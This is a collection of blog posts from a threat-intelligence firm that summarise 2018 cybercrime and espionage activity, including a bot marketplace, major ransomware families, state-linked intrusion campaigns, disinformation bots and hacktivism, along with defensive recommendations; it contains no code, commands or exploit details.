Download a copy of our report to learn more about the types of sensitive data these services are exposing, and how you can help to reduce this problem.


Want more Digital Shadows research? Subscribe to our threat intelligence emails here.

Genesis Botnet: The Market Claiming to Sell Bots That Bypass Fingerprinting Controls Tue, 03 Apr 2018 15:18:06 +0000 An emerging criminal market, Genesis store, provides more effective ways to impersonate a victim’s browser activity, focusing on individual bots rather than huge botnets, and monetizing them in a completely different way. Such an approach may allow criminals to utilize bots with higher efficiency, thus revealing new attack and fraud methods.


Figure 1: Adverts for the Genesis Store on a carding forum

Evolution of fingerprinting controls

Device fingerprinting collects information about a computer in order to identify an individual user. This is a pretty handy technique for retailers and banks who want to prevent fraudsters. Typically, anti-fraud solutions take known fraudulent activity and seek to block transactions that have a similar device fingerprint. This has become and cat-and-mouse affair, as criminals look to randomize their fingerprint with the help of various online services (many of which were covered in our report, Inside Online Carding Courses Designed for Cybercriminals ). In response, anti-fraud technologies take into account a broader set of characteristics.

Criminals, therefore, look to the machines of their victims in order to evade detection. However, obtaining this array of information is challenging. That’s where Genesis comes in. Genesis Store seeks to provide a single solution to emulate this approach, providing access to victims device footprints, accounts, and personal information. The store – registered in November 2017 and still in beta mode – claims to be the result of research conducted across the antifraud technologies used by 283 major banks and payments systems.


Access to a wide range of data

In order to emulate the legitimate users, Genesis provides customers with a wide range of information such as fingerprints, cookies, logs, saved passwords, and personal information.

This information is acquired from web injects, form grabbers and passwords saved in browsers. As these sources get more detailed or updated data, that data is automatically pushed into the store and made available to users. While this means that not all information is verified, it provides a more scalable business model for the administrators.


Figure 2: A screenshot of the Genesis Store


Browser plugin

For less than fifty dollars, users can buy a bot on the Genesis site, which includes the fingerprint, accounts, and cookies (unsurprisingly, the store does not use or sell any products connected with the Russian Commonwealth). For free you also get the Genesis Application, a browser plugin.

The plug-in claims to work with any operating system on Chrome-like browsers (Chrome, Iron, Iridium and others) and provides a seamless way to access the user fingerprint. The plug-in automatically updates and offers additional information on cookies and login data, as well as holder details, security answers, and card details.


Figure 3: The Genesis Security plugin


Innovative monetization techniques

Instead of focusing on selling large quantities of bots in bulk, Genesis focuses on the individual quality of each bot. The actors behind the botnet also have a very clear idea of how to monetize this. For example, their configurations must be used with their own plugin, and will not work without doing so. This is a similar business model to buying games for a Nintendo – you need to buy their own cartridges.


What to look out for

The site makes big claims about its capabilities and it will live and die by how it matches up to these promises. As with all new marketplaces, its success will also depend on user adoption, quality of goods, site security and user experience. Nevertheless, Genesis is still in beta mode yet appears to have picked up a good amount of interest since it was registered in November 2017. There are over 1500 bots available to buy and, at the time of analysis, eight bots had been purchased in the last 20 minutes.

As the site develops and grows out of beta mode and the claimed capabilities are realised, the shift to using more individual bots could have an impact on organization’s ability to combat fraud.

To keep up with our latest in threat intelligence, subscribe here.

RSA Conference 2018 – Digital Shadows Wed, 28 Mar 2018 05:04:16 +0000 RSA Conference is almost here! This year’s conference theme is “Now Matters,” looking at the quick impact threats can have to enterprises globally if we don’t find them today.

Today we see the perfect storm for digital risk and cyber threats. There are more exposure points, more sophisticated attacks, more things to protect, and increased regulations. Security leaders are faced with new challenges every day including:

  • Constant attacks from cyber criminals
  • Employees and third parties exposing sensitive data
  • Limited resources & security talent
  • Ineffective threat intelligence tools
  • Not knowing which digital risks to prioritize
  • Limited access to data sources and language
  • Disparate point solutions
  • Expanding attack surface

I started Digital Shadows to help organizations quickly identify when they are at risk without needing to deploy tons of threat intelligence resources to scan the open, deep, and dark web for threats to their business.

At RSA Conference 2018, our security specialists will be available to walk through how we help our clients quickly identify risks such as data loss, brand impersonation, cyber threats, credential exposure, and more. If you’re interested in a quick chat, book time with us here or visit us at Booth 5107 in the North Hall.

I’m looking forward to the awesome line up of events and activities at this year’s conference and I hope to see you at our party Tuesday night at City View @ Metreon. Cheers!

RSA Party Digital Shadows

The Five Families: The Most Wanted Ransomware Groups Tue, 27 Mar 2018 15:25:30 +0000 Last week we presented a webinar on “Emerging Ransomware Threats and How to Protect Your Data”. Here we discussed the latest ransomware threats and trends, as well as strategies organizations can take to strengthen their defenses and stay compliant.

The ransomware ecosystem has evolved continuously over recent years. There are new operational models such as ransomware-as-a-service (RaaS), and cybercriminals are leveraging remote entry vectors like remote desktop protocol (RDP) and JBoss application servers. Ransomware operators are also experimenting with self-propagation techniques to increase the impact of their attacks.  

With so many different variants in circulation, it can be hard to make sense of what the most critical ransomware threats are to your organization. Although we shouldn’t discount lesser known or less-popular variants, there are five main ransomware families that are prominent currently.



Locky has been active since early 2016 and has predominantly been delivered using spam emails, although the Nuclear and RIG exploit kits have also been used. This ransomware has been consistently updated, particularly with changes to the way encrypted files are appended, leading media reports to attribute different naming conventions to Locky versions, such as Zepto (named after the .zepto extention). Locky activity increased in December 2017 with the resumption of spam activity by the Necurs botnet, which delivered up to 47 million spam emails per day over the holiday period.



Cerber has been frequently developed and distributed since its inception in February 2016, with at least six different versions of the malware developed. Significantly, Cerber is run using a RaaS model, making it a highly automated operation both for actors using the platform and for servicing ransom payments and distributing decryptors to victims. The ransomware typically uses spam email and drive-by-downloads for delivery and has been associated with the RIG and Magnitude exploit kits. Cerber encrypts victim files with a random four-letter extension. Cerber RaaS customers can alter the specific ransom demands, although average prices for unlocking files fall between $1000 and $2000.



Figure 1: Cerber decryption service homepage


DMA Locker

First detected in January 2016, DMA Locker differs from traditional ransomware variants as it does not add a file extension to encrypted files, but instead adds an identifier to the file header. DMA Locker has been delivered through RDP as well as spam emails and the RIG exploit kit. Following a successful infection, the ransomware begins encrypting files if an Internet connection is available. However, if an internet connection is not available, the ransomware installs itself and waits for a connection to be established before encrypting files.



Crysis is distributed via spam emails and the compromised RDP services. Several variants of the ransomware exist to date. The first had decryption keys publicly released, enabling decryption without payment; however, recent variants that encrypt files with .arena, .cobra and .dharma extensions do not currently have publicly available decryption keys. Crysis also has additional capabilities such as harvesting information from the victim machine to send remotely to a command and control server. This included collecting credentials, instant messaging applications, webcam, and browser information.



Active since at least December 2015, SamSam has been used in targeted attacks against high-profile victims and large organizations in the United States, Europe and Asia. These include transport organizations, such as transit authorities, as well as the healthcare and education sectors. Unlike most variants that use phishing emails and exploit kits, SamSam exploits Internet-facing JBoss application servers, then harvests administrator credentials before self-propagating and infecting all the endpoints within a network. Each infected machine is held to ransom, with demands ranging from approximately $4,000 for one machine and $33,000 for all machines within a network. SamSam is believed to be operated by a group known as Gold Lowell.



Figure 2: Overview of the top five ransomware families


Although some ransomware operators have shifted to cryptocurrency mining to make their money, we’d be wrong to assume that ransomware is no longer a threat in 2018. With the above variants still in circulation, and the Colorado Department of Transportation recently experiencing a SamSam ransomware infection on 21 February 2018, it’s clear that the threat from ransomware is a long way away from subsiding.


To that end, there are several measures organizations should employ to ensure they are well-protected in 2018.  

  1. Regularly backup data and verify its integrity. Ensure that backups are remote from the main corporate network and machines they are backing up. Use cloud-based and physical backups.
  2. As SamSam has relied on vulnerable, external-facing servers, applying relevant patches and updates is recommended.
  3. A defense in depth strategy can aid mitigation. This includes Segmenting networks, firewalling-off SMB traffic, and restricting access to important data to only those who are required to have it.
  4. Develop and practice your ransomware playbook so that all members of the organization (operations, IT, security, legal, PR) know their role should the undesirable occur.

Subscribe to our weekly newsletter to get the latest news and research by Digital Shadows.

Shadow Talk Update – 03.26.2018 Mon, 26 Mar 2018 15:05:01 +0000 This week’s Shadow Talk discusses what the Cambridge Analytica revelations mean for disinformation and personal privacy, updates to Trickbot, Zeus Panda and Remnit trojans, City of Atlanta suffers from ransomware attack, and Dragonfly campaign attribution to Russian Government.

US pins energy-sector attacks on Russia-backed threat group

The United States government has named the threat group “Dragonfly” (aka Crouching Yeti, Energetic Bear) as responsible for attacks on the US energy sector over the past two years. The attribution was published in a technical alert that also connected Dragonfly to the Russian state. The multi-stage intrusion campaign of attacks was highly likely intended to gather intelligence, including credentials and files pertaining to industrial control systems (ICS) and associated systems; there was no indication of sabotage or disruption. The threat group allegedly used trusted third-party suppliers to attack its ultimate targets. The naming of Dragonfly is in line with the United States’ pervasive attribution for attacks, but is unlikely to shame the perpetrators into resisting more attacks. Instead, the attackers will likely adapt their tactics, techniques and procedures (TTPs).

Espionage group culls data from US entities with Asian interests

The suspected Chinese cyber espionage group “TEMP.Periscope” (aka Leviathan) has been cited as responsible for network intrusions of US entities with interests in the South China Sea region. To compromise networks and steal information, the group paired new tools with established tactics and techniques, including spearphishing emails and Microsoft Office exploits. The victims have not been named but, given the geopolitical conflict surrounding the South China Sea, the campaign was highly likely politically motivated and aimed at gathering intelligence. Some of the tools are associated with other suspected Chinese groups, which have also been linked to attacks on entities with interests in the same region. However, there was no indication the groups were actively collaborating, and identification of the groups is unconfirmed because many countries have interests in the South China Sea region. TEMP.Periscope has demonstrated high intent in its campaigns, and more attacks are highly likely.

Mining company extorted by thedarkoverlord

On 16 Mar 2018 breach reporting website DataBreaches[.]net reported that threat actor “thedarkoverlord” (TDO) claimed to have successfully compromised the systems of H-E Parts Morgan, a manufacturer of components for the mining industry. H-E Parts Morgan has not yet publicly commented on the reported breach; information disclosed to DataBreaches[.]net suggests the company refused TDO’s extortion demands. TDO has made no public announcement via social media in reference to this incident. This deviates from the standard modus operandi of the group, which tends to use Twitter to exert pressure on victims to pay an extortion fee.

Adware compromises supply chain, infects millions of Androids

The new adware family “RottenSys” successfully compromised a supply chain process and has infected almost five million Android devices since 2016. The malware masqueraded as a Wi-Fi service application on the devices, and used special permissions to download malicious components via a dropper. To display advertisements on devices, the attackers used a publicly available Android application virtualization framework. The perpetrators have highly likely accrued significant funds from their campaign; an estimated USD 115,000 has been earned since 12 Mar 2018 alone. As well as malvertising, the attackers appeared to be testing a new botnet using RottenSys’ command-and-control (C2) infrastructure. This botnet could be leased to other threat actors to bolster the attackers’ profits.

DDoS attack hits Russian Central Election Commission website

The website of the Russian Central Election Commission was reportedly hit by a distributed denial of service (DDoS) attack on 18 Mar 2018. The DDoS monitoring service DDoSMon reported the site was targeted using the Memcached amplification techniquea method recently adopted by a variety of threat actors. Attribution for the attack was unknown; no hacktivist or threat groups have claimed responsibility at the time of writing. The objective was almost certainly to cause disruption and degradation of service, as the timing coincided with the 2018 Russian presidential election.

APT-28 adopts new anti-sandbox evasion technique

Researchers at security company Palo Alto identified two attacks, on 12 and 14 Mar 2018, respectively, targeting an unnamed European government agency with an updated version of the “DealersChoice” Flash exploitation framework. The attacks were attributed to “APT-28” (aka Fancy Bear, Sofacy). Spearphishing emails referencing a security conference were sent with a Microsoft Word (.docx) document attached. A newly observed anti-sandbox evasion technique loaded a malicious Flash object only after a user had scrolled to the third page of the document. This ensured human interaction, and evolved from the previous tactic of a Flash object loading immediately upon the document’s opening. APT-28’s continued use of this new evasion technique is highly likely.

Pop-up Twitter Bots: The Shift to Opportunistic Targeting Thu, 22 Mar 2018 16:10:39 +0000 Since the furor surrounding Russia’s alleged use of Twitter bots to influence the 2016 presidential election in the United States, social media bots have been most commonly associated with carefully planned, long-term campaigns. However, we have observed a shift whereby automated bots increasingly are established to provide an opportunistic reaction to events or individuals, in very short and targeted campaigns. Advances in artificial intelligence will likely facilitate the creation of more believable throwaway bot networks with less investment needed to deliver expedient effects.

We recently worked on a fascinating Request for Information (RFI) from a client. Without disclosing too much, the organization suspected one of its employees had been targeted by Twitter bots. Following research, it appeared our client’s suspicions were correct: bots had been automatically spamming the employee’s Twitter page. Case closed and on to the next RFI.

However, as the dust settled from the task, we began thinking that this reflected a change in the way bots are used to spread disinformation. Bots and their many variants have been around for years and are used by a range of actors in many different ways, be it ISIS “ghost tweeting” its messages to give the appearance of a wider worldwide following, fake Chinese social media posts on Weibo intended to drown out messages about bad news and politically sensitive issues or celebrities using fake followers to increase their online influence. This particular case was interesting for two reasons:

  1. The focused targeting of an individual outside of significant geopolitical event (albeit with crudely executed content)
  2. The short-term nature of the bots’ activity, initiated in response to a specific event and ended when the campaign’s ostensible goal was achieved

From the Masses to the Individual

Mass targeted disinformation is a well-known phenomenon, given press coverage of the growing number of “troll farms” springing up globally. Since a troll farm is staffed by humans, the farm’s masters can target individual users and engage them in complex and intelligent dialog that appears authentic in its spontaneity. The Holy Grail for this type of malicious actor would be a bot that could engage millions of users with the authenticity of a human troll.

In the case of nation states, campaigns may be part of long-term projects to influence other countries’ public discourse, such as the bots used to influence British politics in the 2016 EU referendum and subsequent election in 2017. This case was different. The bot campaign we were investigating appeared to have been established soon after particular actions by the targeted individual and disbanded immediately after the bots achieved their purpose. The “pop-up” nature of this bot campaign has been reflected in recent media stories: a widespread story about a Muslim woman walking past and ignoring injured victims of the March 2017 terror attack in Westminster has been attributed to a “fake news” bot campaign, and bots were observed attempting to influence the discourse about gun control laws following the February 2017 school shooting in Florida. This suggests actors are establishing bot networks to provide immediate, opportunistic reaction to events.


Where is this trend going in the future?

Technically, the key factor to watch is the development of artificial intelligence (AI), specifically regarding the Turing Test (a computer’s ability to convince a human user they are speaking to another human and not a computer). Given the textual, non-real-time medium of many social media platforms, computers have a distinct advantage in this area, and as early as 2014 some researchers claimed to have AI programs that could pass the Turing Test (Google “Eugene Goostman”).

With this level of authenticity, mass targeted disinformation campaigns become a realistic possibility for the disinformation peddler. These ideas have been expanded upon by authors such as Keir Giles (see: Handbook of Russian Information Warfare), who proposed scenarios whereby bots conduct mass targeted disinformation campaigns on the eve of a large-scale NATO troop mobilization. Such advances in AI also play into the hands of malicious actors creating bots for short-term purposes as they enable more believable bots to be set up swiftly, without spending months teaching bots what to say on a particular topic.

These ideas are not only interesting but important given the current influence that social media-driven news and propaganda currently have across the globe. This applies to nation states at election times, but it also relevant to businesses. You can read more about disinformation campaigns affecting organizations (as well as how to combat them) in a recent research paper of ours, “The Business of Disinformation.”

Subscribe to our weekly newsletter to get the latest news and research by Digital Shadows.

Cyber Security as Public Health Wed, 21 Mar 2018 16:09:19 +0000 Public health, one of the great 20th century ideas, has many instructive lessons for cyber security in the 21st. Let’s recap. Public health was defined by Charles-Edward Winslow in 1920 as:

“Public health is the Science and Art of preventing disease, prolonging life, and promoting health and efficiency through organized community effort for sanitation of the environment, the control of communicable disease, the education of the individual in personal hygiene, the organization of medical and nursing services for early diagnosis and preventive treatment of disease, and the development of the social machinery to insure everyone a standard of living adequate for maintenance of health, so organizing these benefits as to enable every citizen to realize his birthright of health and longevity”

While a lot has changed since 1920, including the use of the singular they, these statements still resonate today. The first statement mentions the interdisciplinary nature of the field. Cyber security truly is both an art and a science, which we will return to at the end of this blog. Let’s break down the key parts of Winslow’s definition:

This mission statement is comprehensive. It mentions both a preventative goal and a longevity goal: we need cyber security to not only be about preventing things but also encouraging the beneficial side effects of security for individuals, communities and marketplaces. The explicit reference to an organized community underlines the need for collective action. No matter how secure you may be as an organization or an individual, we work and play in a shared space. If that space resembles more the “Wild West” rather than an organized society, your experience will suffer irrespective of your own security posture. Winslow goes on to detail what needs to be done:


1.    Sanitation of the environment

  • Security Engineering, especially the definition and application of Secure Development Lifecycles to reduce software maintenance costs and increase reliability of software concerning software security related bugs.
  • Community action, sharing of security-related information, timely action on take down requests, appropriate ingress and egress filtering to prevent malicious traffic.


2.    Control of communicable disease

Hardening of systems to make the initial infection as difficult as possible (e.g., disallowing Macros, DDE-enabled documents, etc.) and in the eventual case of infection, to contain the spread as much as possible through segmenting the networks of key systems and monitoring for security events such as credential reuse.


3.    Education of the individual in personal hygiene

People are often the weakest link in security, not only the individual who clicks on a phishing email, but the system admin who is responsible for patching and secure configuration of systems. Training and education which is essential for individuals to use the Internet safely – both at work and at home – is essential.


4.    Organization of medical services for early diagnoses and preventative treatment of disease

The public and private sector need to work together in order for early signs of infection, e.g., destructive outbreaks like WannaCry or NonPetya, to be picked up and shared. The more collaboration there is, the better place we all are to limit the damage incurred by such incidents. Some public-sector organizations already provided comprehensive alerts, such as US-CERT.

Public health covers many different disciplines, just like cyber security. This stems from the important realization that there is not just one single focus area that is sufficient to improve public health. The success of vaccination programs, for example, depend on a wide range of disciplines. Cyber security, similarly, requires improvements not just in technical fields, although they are sorely needed! Politics, legal issues, regulations, economics, social organization all have a part to play. While we wrestle with the details in our daily work, it’s good to keep in mind the big picture.


Subscribe to our weekly newsletter to get the latest news and research by Digital Shadows.

Shadow Talk Update – 03.19.2018 Mon, 19 Mar 2018 14:15:48 +0000 This week’s Shadow Talk features the latest techniques in tax return fraud, claimed vulnerabilities in AMD chips, Slingshot malware targeting Mikrotik routers, and Greenflash Sundown Exploit Kit delivering Hermes ransomware.



Slingshot espionage campaign undetected for six years

A newly detected cyber espionage campaign used a compromised router as a foothold to drop malicious information-stealing components on to victims’ devices and networks. The “Slingshot” campaign has targeted almost 100 entities to date, predominantly in the Middle East and Africa. The earliest identified samples dated from 2012, which indicates the campaign has avoided detection for six years. Attribution was unconfirmed at the time of writing; however, the attackers appear to be highly skilled and well resourced, indicating they are potentially state-sponsored.


APT-15 observed targeting UK government contractor

On 10 Mar 2018, researchers at NCC Group reported new activity attributed to APT-15. Two operations impacted an unnamed UK government service provider, with attackers harvesting information pertaining to UK military and government departments. The group used two custom backdoors, custom information-gathering tools and native Windows tools to exfiltrate sensitive information. Following the first operation, which resulted in its ejection from the target network, the group used restructured tactics, techniques and procedures to re-enter the target system. The operations indicated a relatively well-resourced threat actor with a high level of intent to obtain precise information. Although APT-15 has previously been linked to China, there are insufficient indicators to support this attribution at the time of writing.


APT-28 updates operational toolkit

On 09 Mar 2018 cyber security company Kaspersky, published a report describing evolutions in the toolkit and activity of APT-28, a threat group associated with the Russian state. The report assessed the group now operates in distinct sub-divisions focused on targeting, development and coding. Researchers noted significant overlap of the group’s operations with other APT groups’ activity, including Russian-state–linked Turla. The report also described updates to the group’s operational toolkit and noted that the group has been observed targeting entities in the Middle East and Asia. APT-28’s operational development and its continued targeting of entities within the political or military landscape correlates to previous activity attributed to the group. Therefore, it remains likely that reports of operational activity and attacks attributed to the group will increase in the short to medium term (one to six months).


CTS Labs discloses 13 alleged AMD processor vulnerabilities

On 14 Mar 2018, CTS Labs detailed 13 vulnerabilities which allegedly allowed an attacker to install malware on AMD processors and permitted access to protected information located in processor chips. CTS Labs claimed it had provided AMD with 24 hours’ notice before publicly disclosing the vulnerabilities. As no technical details were released with the research, Digital Shadows could not analyze the alleged vulnerabilities.


MuddyWater group targets Turkey, Pakistan and Tajikistan

On 12 Mar 2018, Trend Micro, a cyber security company, reported that government and telecommunications entities in Tajikistan, as well as undisclosed sectors in Turkey and Pakistan, were targeted by activity attributed to “MuddyWater”, an espionage group. The group used similar tactics, techniques and procedures to its previous activity: primarily phishing emails with macro-enabled documents to achieve initial compromise. While technical indicators in this attack overlapped with those seen in historical MuddyWater activity, the PowerShell backdoor payload used in the recent attack had been updated, likely in an attempt to remain undetected. At the time of writing there is little information available pertaining to harvested data or the entities affected. The Saudi Arabian NCSC published an advisory on MuddyWater, indicating the group presents a notable threat to targeted entities.


Middlebox HTTP injection redirects deliver spyware

On 09 Mar 2018 the research organization CitizenLab reported two campaigns using PacketLogic deep packet inspection middleboxes to conduct injected HTTP redirects. Internet service provider customers in Egypt were redirected to pages containing cryptocurrency miners in a likely financially motivated attack. Selected Turkish users accessing legitimate domains using HTTP were redirected to download surveillance tools FinFisher or a variant of StrongPity, indicating the attack’s objective was information gathering. The initial infection vector against telecom infrastructure is unknown. Users are encouraged to avoid accessing and downloading content from domains using HTTP, as network traffic is unencrypted and vulnerable to “man in the middle” attacks.


Compromised BitTorrent client distributed by download server

On 13 Mar 2018, Microsoft Defender published research detailing a SmokeLoader campaign delivering CoinMiner, software which can be used to mine cryptocurrency from target systems. The activity produced approximately 500,000 attempted infections within a 12-hour period. The rapid infection rate was due to a compromised executable for BitTorrent client “MediaGet”, that was distributed via a legitimate program download server and operated as a legitimate program with a backdoor capacity which delivered the Smoke Loader downloader and dropped CoinMiner. It was unclear why Smoke Loader and CoinMiner, malware variants with high malicious detection rates by anti-virus solutions, were deployed in an operation which likely required significant planning regarding the initial infection vector.



Subscribe to our weekly newsletter to get the latest podcast and other research by Digital Shadows.

Anonymous and the New Face of Hacktivism: What to Look Out For in 2018 Tue, 13 Mar 2018 15:03:05 +0000 The Anonymous collective has been the face of activism since 2008. Since then, the group’s membership, operations, and structure have changed significantly. In this blog, we examine the changes in Anonymous and look at how the group will continue to change in the coming years.

The Anonymous collective rose to fame in 2008 and 2009. Emerging from the quagmire of 4chan’s /b/ board, an imageboard for “random” content (Figure 1), the group quickly gained followers after ‘Project Chanology’, a 2008/9 campaign against Scientology. This blended relatively new tactics, like mass distributed denial of service (DDoS) attacks that rendered the main scientology websites offline, with old school phreaking and traditional protests.

Figure 1: The original /b/ post starting Project Chanology

The group continued to gain momentum, targeting opponents of internet piracy and websites of financial institutions that had withdrawn banking facilities from Wikileaks under OpPayback in 2010. The combination of widespread, disruptive DDoS attacks and their ability to publicize their campaigns led to Time magazine naming Anonymous as one of the 100 most influential people in the world in 2012.

Although the collective continued its operations, including OpIsrael and OpIcarus, the popularity and media attention gained by the group peaked in November 2016 during OpIsis and OpParis, both operations targeting supporters of Islamic State.

So, what happened to make “one of the most influential people” in the world fade from consciousness so quickly?

1. Anonymous has reached critical mass

Simply put, the group has become too big to be effective. Contrary to its original advertising and statements, the formative stages of the group were strictly hierarchical. Operations were organized on central forums and Internet relay chat (IRC) channels, with details approved by a series of moderators. This level or coordination enabled the organization and impact of their early operations.

Conversely, the family-friendly tactics (the Anonymous term for an operation that uses only legal tactics, such as reporting accounts for takedown) of OpIsis acted as a membership recruitment drive, leading to a huge influx of members with little to no technical capabilities. With such a large amount of people, focused operations have become harder to organize, as motives and skills divide. Older members talk about the dilution of the brand (Figure 2). The lack of a central organizational points means that operations and attacks are diverse, uncoordinated, and largely small scale.

Figure 2: Reddit users discuss the change in the Anonymous identity

2. Anonymous no longer encapsulates the cultural Zeitgeist

From 2010, Anonymous was synonymous with populist protest for the first half of the decade. The group’s brand – the Guy Fawkes mask from the 1984 ‘V for Vendetta’ graphic novel – was linked with the Occupy movement’s early protests in 2011, and the Million Mask March, held in 2013. Anonymous became associated with anti-establishment protests.

However, in 2018, this zeitgeist has changed. The Occupy movement has largely faded from public consciousness, and global politics has moved on. The proliferation of low level operations has changed the way the public view the collective, and without publicity the impact of their operations is greatly lessened. Furthermore, the lack of media coverage and the dilution of the brand have led to an exodus of the more technically capable members to smaller groups, leaving very little of the original collective behind.

3. Anonymous lacks a popular cause

When Anonymous began, the collective played to a relatively populist agenda. Chanology responded to growing media doubts about the nature of scientology, and OpPayback played on the public profile of Wikileaks. OpIcarus captured the anti-financial sector feeling as the news broke about high financial sector salaries despite austerity and the European debt crisis. OpIsis and OpParis both linked in with huge waves of outrage after the attacks in Paris in November 2015.

Since then, the collective has been unable to find a cause that simultaneously both unites members within the collective and captures the attention of the outside world. Smaller operations have been created – OpSyria, OpTurkey, OpDomesticTerrorism – but the main attack phase has rarely lasted beyond one month, and has not been adopted by more than two or three factions. Although the group originated as a vaguely anarchic collective, there is an inherent hero complex evident in the group’s collective language: without a cause, members are likely to move on.

Given this, what’s next for the collective, and for the threat from hacktivist groups?

1. Family-friendly and opportunistic attacks

It is highly likely that central Anonymous affiliates will continue to conduct legacy operations, such as OpIsis, OpSyria, and OpDomesticTerrorism. However, as the influence and capabilities of the group are waning, these are likely to be confined to “family-friendly” and opportunistic attacks, either reporting social media accounts, or claiming DDoS attacks against smaller companies with weak cyber security.

2. Regional groups

The dilution of the central brand has coincided with the rise of the number of regional and national groups. Factions such as AnonymousBrasil, AnonymousCatalunya, and AnonPlus are all smaller, more focused, and have closer to ties with regional politics. This enables them to mount persistent and targeted campaigns. Operations such as OpOlympicHacking were able to cause real disruption because AnonymousBrasil was able to coordinate activities amongst its members, and was linked to a traditional political objective. Although it is unlikely that the capabilities of these groups will grow outside of DDoS and website defacement attacks, their operations are likely to become longer and more targeted.

Figure 3: OpOlympicHacking banner, October 2016 (source: Twitter)

3. Breakaway Groups

Older members – and more nostalgic members – of the collective have already started to break away into smaller groups reminiscent of 2009. In 2017 there were a significant number of groups claiming to be LulzSec and AntiSec reborn. However, these groups are unlikely to reach the intent of their originals: a lack of media attention and impact mean that the members drift apart relatively quickly.

Figure 4: CyberGuerrilla were the first group to break away in 2014


The capabilities of the Anonymous collective were never technical: instead, they relied on causing disruption and gathering enough media attention to amplify their perceived influence. As we head into 2018 public attention has moved on, directed at threat groups with both the capability and intent to cause both destruction and disruption. The Anonymous brand is likely to live on in smaller, regional hacktivist groups who will target companies in line with regional and national geopolitical objectives, but the days of mass projects and mass campaigns are over.

Subscribe to our weekly newsletter to get the latest news and research by Digital Shadows.

Shadow Talk Update – 03.12.2018 Mon, 12 Mar 2018 15:09:50 +0000 This week’s Shadow Talk features more distributed denial of service (DDoS) attacks using Memcached servers, how disinformation is more than just a political concern, updates on the Spectre vulnerability following the release of a new proof of concept (POC) exploit, and more reporting on the historical network intrusion against the German government.

Memcached DDoS attacks break peak volume records

Attackers using Memcached reflection, a type of DDoS attack, have twice achieved the highest recorded peak volumes since 27 February. An attack on the code-sharing website GitHub reached 1.35Tbps, and a subsequent attack on an unnamed company in the United States peaked at 1.7Tbps. The peak was helped by the availability of internet-facing Memcached servers listening on user datagram protocol (UDP) port 11211 without traffic filtering. The media attention garnered by these attacks likely prompted opportunistic extortion attempts reported in the past week. Efforts have been made to reduce the number of internet-facing Memcached servers susceptible to this attack method, but the threat is unlikely to disappear in the next month.


Disinformation campaign aimed at Persian speakers

A disinformation campaign intended to influence Persian speakers and discredit Western media outlets has been in operation for approximately seven years. The campaign implicated some legitimate media outlets, such as the BBC, by establishing fake websites impersonating them. No malware was delivered in this campaign. Despite the use of disinformation campaigns for political objectives, the wide availability of tools and relatively low costs associated with performing these operations means that disinformation is also a threat to businesses in a variety of industries. Download a copy of our research report, The Business of Disinformation: A Taxonomy, to see tools actors can turn to when waging disinformation campaigns and what it means for organizations in the next year.


Researchers publish PoC exploit for SgxPectre

Researchers at the University of Ohio, in the United States, released PoC code for a vulnerability dubbed SgxPectre, a claimed variation of the “Spectre” vulnerability. SgxPectre enables unauthorized access to sensitive data protected by Intel’s Software Guard eXtensions (SGX). The vulnerability affects runtime libraries, meaning any program using SGX is potentially vulnerable. Release of any PoC code has previously encouraged threat actors to attempt exploitation of vulnerabilities, but in this case no such attempts have yet been detected. It is not known which types of information can be accessed by exploiting this vulnerability, or how easy it is to exploit.


Historical compromise of German government now linked to Turla

Attackers infected 17 computers in the German Federal Foreign Office with an undisclosed malware variant. The malware exfiltrated data and received commands using Microsoft Outlook. The intrusion, first reported 28 February 2018, affected the Foreign Office from March 2017 to December 2017. Attribution was initially made to the threat group “APT-28” (aka Fancy Bear), but journalists later cited the threat group “Turla”. The attack was said to be part of a wider campaign affecting multiple geographies and was likely conducted by a well-resourced group.


Subscribe to our weekly newsletter to get the latest podcast and other research by Digital Shadows.

Ransomware in 2018: 4 Things to Look Out For Thu, 08 Mar 2018 23:59:00 +0000 Ransomware remains an active threat for organizations into 2018. Last year, large scale attacks like NotPetya and WCry wreaked havoc, shutting systems and costing millions of dollars in recovery. To develop effective mitigation strategies, we need to closely analyze the ever-evolving ransomware landscape. In particular, we expect developments in four broad areas, namely: ransomware delivery mechanisms, lateral movement tools, service models, and payment mechanisms.

Ransomware Developments in 2018

 1. Delivery mechanisms

Ransomware can be delivered by multiple vectors. To limit the need for initial user interaction, threat actors are using exposed internet facing infrastructure, like Remote Desktop Protocol (RDP) as an entry vector. This is partly due to availability, especially as RDP credentials or brute forcing tools are easily purchasable on criminal forums. However, there are also tactical and operational reasons for this: RDP allows machine access, meaning that threat actors can identify specific areas of valuable data or even move laterally across networks.

Ransomware in 2018

Figure 1: RDP brute forcing tool advertised for $4.25 on criminal marketplace

Other remote entry vectors that ransomware operators can target include Internet Information Services (IIS) or JBoss application servers.

 2. Self-propagation

Self-propagation mechanisms leverage the damaging impact of a single endpoint infection. Companies with locked down external networks may have flat internal networks, producing conditions for ransomware to self-propagate. Self-propagation is becoming popular among ransomware operators because:

  • Tools like PsExec and Windows Management Instrumentation Command can use batch script files to automate lateral movement within networks
  • Vulnerability exploits are available, for example SMB exploit “EternalBlue” used during WCry
  • Malicious groups can demand larger extortion amounts with multiple infections, or produce a highly damaging attack like NotPetya

 3. Ransomware as a service (RaaS)

Ransomware as a service (RaaS) models give threat actors without skills or resources the ability to deliver ransomware. Like other as a service models, users can sign up to platforms that provide backend infrastructure to manage operations. While RaaS is not new, the continued emergence of new variants shows the service remains in active development, and that a market still exists for it. This service model opens the ransomware marketplace to a wider variety of threat actors, while still remaining profitable for developers as they generally receive a percentage of each infection.

 4. Payment mechanisms

Ransomware variants deployed in financially motivated attacks live and die by profit generation. Payment mechanisms are currently an area of weakness for ransomware developers as they are not often automated or scalable. Ransomware operators tend to rely on email or TOR sites with cryptocurrency payments, which likely reduces operational effectiveness. Some variants have fully automated payment system infrastructure, from infection to payment, and delivery of decryption keys; however, these are relatively limited. Large, self-propagating attacks to date had poorly implemented payment infrastructure – as seen with the WCry attack that only had three Bitcoin wallets to receive payment due to a bug in the malware’s code.


Building your Ransomware Playbook

Establishing a ransomware playbook can help preparation for an eventual attack. The playbook can be used to define specific roles and functions should the unwanted occur, allowing organizations to establish tactics for managing a ransomware infection, as well as strategies for dealing with the aftermath. An effective ransomware playbook:

  • Requires a whole-of-business approach to planning. Ransomware affects multiple business areas and may result in large scale service disruption
  • Plans responses to extortion demands and identifies “worst case” scenarios
  • Shows an understanding of your playing field and adversaries. Threat intelligence can help to inform approaches to ransomware attacks

For more insight into the ransomware ecosystem, join our live webinar on “Emerging Ransomware Threats and How to Protect Your Data” being held on 15 March 2018. Hear from Digital Shadows’ analysts and the FBI Cyber Division’s leading ransomware investigator about the latest threats and vectors, as well as best practices for protecting you and your organization.

